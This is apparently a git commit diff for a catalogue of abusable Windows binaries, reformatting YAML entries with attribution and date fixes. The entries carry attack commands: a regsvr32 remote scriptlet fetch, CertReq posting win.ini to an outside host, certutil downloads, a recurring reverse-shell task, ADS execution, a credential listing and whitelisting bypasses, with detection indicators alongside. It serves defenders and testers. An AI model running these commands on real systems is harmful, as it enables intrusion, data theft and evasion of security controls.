Merge branch 'master' into feat/yamllinting

This commit is contained in:
Oddvar Moe 2021-10-22 15:20:35 +02:00 committed by GitHub
commit 9f9af1cfee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
159 changed files with 1270 additions and 932 deletions

View File

@ -36,4 +36,4 @@ Acknowledgement:
- Person: John Doe - Person: John Doe
Handle: '@johndoe' Handle: '@johndoe'
- Person: Ola Norman - Person: Ola Norman
Handle: '@olaNor' Handle: '@olaNor'

View File

@ -14,4 +14,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/bohops/status/986984122563391488 - https://twitter.com/bohops/status/986984122563391488
Notes: Thanks to Jimmy - @bohops Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -22,4 +22,6 @@ Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128 - https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873 - https://twitter.com/teemuluotio/status/990532938952527873
Notes: '' Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,8 +2,7 @@
Name: Nltest.exe Name: Nltest.exe
Description: Credentials Description: Credentials
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: '' Description: ''
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://twitter.com/sysopfb/status/986799053668139009 - https://twitter.com/sysopfb/status/986799053668139009
- https://ss64.com/nt/nltest.html - https://ss64.com/nt/nltest.html
Notes: Thanks to Sysopfb - @sysopfb Acknowledgement:
- Person: Sysopfb
Handle: '@sysopfb'

View File

@ -3,7 +3,6 @@ Name: Openwith.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: OpenWith.exe /c C:\test.hta - Command: OpenWith.exe /c C:\test.hta
Description: Opens the target file with the default application. Description: Opens the target file with the default application.
@ -16,4 +15,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/harr0ey/status/991670870384021504 - https://twitter.com/harr0ey/status/991670870384021504
Notes: Thanks to Matt harr0ey - @harr0ey Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'

View File

@ -3,7 +3,6 @@ Name: Powershell.exe
Description: Execute, Read ADS Description: Execute, Read ADS
Author: '' Author: ''
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: powershell -ep bypass - < c:\temp:ttt - Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@ -14,4 +13,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752 - https://twitter.com/Moriarty_Meng/status/984380793383370752
Notes: Thanks to Moriarty - @Moriarty_Meng Acknowledgement:
- Person: Moriarty
Handle: '@Moriarty_Meng'

View File

@ -18,4 +18,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Notes: 'Thanks to ' Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,7 +2,7 @@
Name: Robocopy.exe Name: Robocopy.exe
Description: Copy Description: Copy
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: [] Categories: []
Commands: Commands:
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
@ -16,4 +16,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Notes: Thanks to Name of guy - @twitterhandle Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,8 +2,7 @@
Name: AcroRd32.exe Name: AcroRd32.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/997997818362155008 - https://twitter.com/pabraeken/status/997997818362155008
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Gpup.exe Name: Gpup.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Description: Execute another command through gpup.exe (Notepad++ binary). Description: Execute another command through gpup.exe (Notepad++ binary).
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/997892519827558400 - https://twitter.com/pabraeken/status/997892519827558400
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nlnotes.exe Name: Nlnotes.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes. Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808 - https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Notes.exe Name: Notes.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes. Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808 - https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Nvudisp.exe Name: Nvudisp.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Nvudisp.exe System calc.exe - Command: Nvudisp.exe System calc.exe
Description: Execute calc.exe as a subprocess. Description: Execute calc.exe as a subprocess.
@ -23,4 +22,7 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nvuhda6.exe Name: Nvuhda6.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: nvuhda6.exe System calc.exe - Command: nvuhda6.exe System calc.exe
Description: Execute calc.exe as a subprocess. Description: Execute calc.exe as a subprocess.
@ -23,4 +22,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
Notes: Thanks to Adam - @hexacorn Acknowledgement:
- Person: Adam
Handle: '@hexacorn'

View File

@ -2,8 +2,7 @@
Name: ROCCAT_Swarm.exe Name: ROCCAT_Swarm.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/994213164484001793 - https://twitter.com/pabraeken/status/994213164484001793
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Setup.exe Name: Setup.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Run Setup.exe - Command: Run Setup.exe
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/994381620588236800 - https://twitter.com/pabraeken/status/994381620588236800
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Usbinst.exe Name: Usbinst.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Description: Execute calc.exe through DefaultInstall Section Directive in INF file. Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/993514357807108096 - https://twitter.com/pabraeken/status/993514357807108096
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: VBoxDrvInst.exe Name: VBoxDrvInst.exe
Description: Persistence Description: Persistence
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/993497996179492864 - https://twitter.com/pabraeken/status/993497996179492864
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -1,7 +1,7 @@
Name: aswrundll.exe Name: aswrundll.exe
Description: This process is used by AVAST antivirus to run and execute any modules Description: This process is used by AVAST antivirus to run and execute any modules
Author: Eli Salem Author: Eli Salem
Created: 19\03\2019 Created: '2019-03-19'
Commands: Commands:
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"' - Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
Description: Load and execute modules using aswrundll Description: Load and execute modules using aswrundll
@ -17,4 +17,4 @@ Resources:
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
handle: https://www.linkedin.com/in/eli-salem-954728150 handle: 'https://www.linkedin.com/in/eli-salem-954728150'

View File

@ -2,7 +2,7 @@
Name: winword.exe Name: winword.exe
Description: Document editor included with Microsoft Office. Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: winword.exe /l dllfile.dll - Command: winword.exe /l dllfile.dll
Description: Launch DLL payload. Description: Launch DLL payload.
@ -10,7 +10,7 @@ Commands:
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
MItreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
@ -26,4 +26,4 @@ Acknowledgement:
Handle: '@@vysecurity' Handle: '@@vysecurity'
- Person: Adam (Internals) - Person: Adam (Internals)
Handle: '@Hexacorn' Handle: '@Hexacorn'
--- ---

View File

@ -2,18 +2,18 @@
Name: testxlst.js Name: testxlst.js
Description: Script included with Pywin32. Description: Script included with Pywin32.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1064 MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064
OperatingSystem: Windows OperatingSystem: Windows
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1064 MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@ -25,4 +25,6 @@ Detection: []
Resources: Resources:
- https://twitter.com/bohops/status/993314069116485632 - https://twitter.com/bohops/status/993314069116485632
- https://github.com/mhammond/pywin32 - https://github.com/mhammond/pywin32
Notes: Thanks to Jimmy - @bohops Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -0,0 +1,28 @@
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'
---

View File

@ -2,12 +2,12 @@
Name: At.exe Name: At.exe
Description: Schedule periodic tasks Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith' Author: 'Freddie Barr-Smith'
Created: '2019-09-20' Created: 2019-09-20
Commands: Commands:
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Description: Create a recurring task to execute every day at a specific time. Description: Create a recurring task to execute every day at a specific time.
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
Category: Execute Category: Execute
Privileges: Local Admin Privileges: Local Admin
MitreID: T1053 MitreID: T1053
MitreLink: https://attack.mitre.org/wiki/Technique/T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053
@ -17,10 +17,10 @@ Full_Path:
- Path: C:\WINDOWS\SysWOW64\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe
Detection: Detection:
- IOC: Scheduled task is created - IOC: Scheduled task is created
- IOC: Windows event log - type 3 login - IOC: Windows event log - type 3 login
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
- IOC: C:\Windows\Tasks\At1.job - IOC: C:\Windows\Tasks\At1.job
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources: Resources:
- Link: https://freddiebarrsmith.com/at.txt - Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator

View File

@ -2,7 +2,7 @@
Name: Atbroker.exe Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT) Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ATBroker.exe /start malware - Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT). Description: Start a registered Assistive Technology (AT).
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
@ -26,4 +26,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
--- ---

View File

@ -2,7 +2,7 @@
Name: Bash.exe Name: Bash.exe
Description: File used by Windows subsystem for Linux Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
@ -39,7 +39,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe - Path: C:\Windows\SysWOW64\bash.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Child process from bash.exe - IOC: Child process from bash.exe
@ -50,4 +50,4 @@ Acknowledgement:
Handle: '@aionescu' Handle: '@aionescu'
- Person: Asif Matadar - Person: Asif Matadar
Handle: '@d1r4c' Handle: '@d1r4c'
--- ---

View File

@ -2,7 +2,7 @@
Name: Bitsadmin.exe Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
@ -39,7 +39,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Child process from bitsadmin.exe - IOC: Child process from bitsadmin.exe
@ -56,4 +56,4 @@ Acknowledgement:
Handle: '@carnal0wnage' Handle: '@carnal0wnage'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: CertReq.exe Name: CertReq.exe
Description: Used for requesting and managing certificates Description: Used for requesting and managing certificates
Author: 'David Middlehurst' Author: 'David Middlehurst'
Created: '2020-07-07' Created: 2020-07-07
Commands: Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: certreq creates new files - IOC: certreq creates new files

View File

@ -1,8 +1,8 @@
--- ---
Name: Certutil.exe Name: Certutil.exe
Description: Windows binary used for handeling certificates Description: Windows binary used for handling certificates
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder. Description: Download and save 7zip to disk in the current folder.
@ -44,7 +44,7 @@ Commands:
MitreID: T1140 MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140 MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName - Command: certutil --decodehex encoded_hexadecimal_InputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures Usecase: Decode files to evade defensive measures
Category: Decode Category: Decode
@ -55,7 +55,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Certutil.exe creating new files on disk - IOC: Certutil.exe creating new files on disk

View File

@ -2,9 +2,9 @@
Name: Cmd.exe Name: Cmd.exe
Description: The command-line interpreter in Windows Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut' Author: 'Ye Yint Min Thu Htut'
Created: '2019-06-26' Created: 2019-06-26
Commands: Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: Add content to an Alternate Data Stream (ADS). Description: Add content to an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS Category: ADS
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: cmd.exe executing files from alternate data streams. - IOC: cmd.exe executing files from alternate data streams.

View File

@ -1,8 +1,8 @@
--- ---
Name: Cmdkey.exe Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials. Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cmdkey /list - Command: cmdkey /list
Description: List cached credentials Description: List cached credentials
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Usage of this command could be an IOC - IOC: Usage of this command could be an IOC
@ -23,6 +23,6 @@ Resources:
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
--- ---

View File

@ -2,11 +2,11 @@
Name: Cmstp.exe Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile. Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1191 MitreID: T1191
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
